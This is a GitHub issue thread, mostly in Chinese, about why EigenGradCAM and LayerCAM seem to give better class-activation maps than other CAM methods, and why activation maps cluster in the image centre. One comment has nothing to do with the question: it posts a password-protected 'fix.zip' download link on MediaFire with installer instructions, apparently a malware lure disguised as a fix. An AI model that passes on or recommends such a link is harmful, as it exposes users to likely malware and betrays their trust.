### ISSUE TITLE
为什么EigenGradCAM和LayerCAM要比其它的CAM效果好很多？

### ISSUE THREAD

**Issue by y070504** [Fafa-DL/Awesome-Backbones#125]
<img width="847" alt="微信图片_20240828134737" src="https://github.com/user-attachments/assets/23d0ec8f-01c2-4925-af28-9d1a09008913">

[https://github.com/Fafa-DL/Awesome-Backbones/blob/main/datas/docs/CAM_visualization.md](url)

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Fafa-DL** [comment]
这个说不准的呀，和数据集、模型啥的都有关

**Comment by chenyonx** [comment]
<img width="650" height="368" alt="Image" src="https://github.com/user-attachments/assets/8a8434f2-2e55-47f3-8f75-400ebe0ed0b4" />

<img width="650" height="372" alt="Image" src="https://github.com/user-attachments/assets/c0b1892c-492b-4d5d-a187-4a8038aeb328" />为何激活图可视化置信度很高，所有结果图的，类激活图却全部都在中央，大家知道什么原因吗
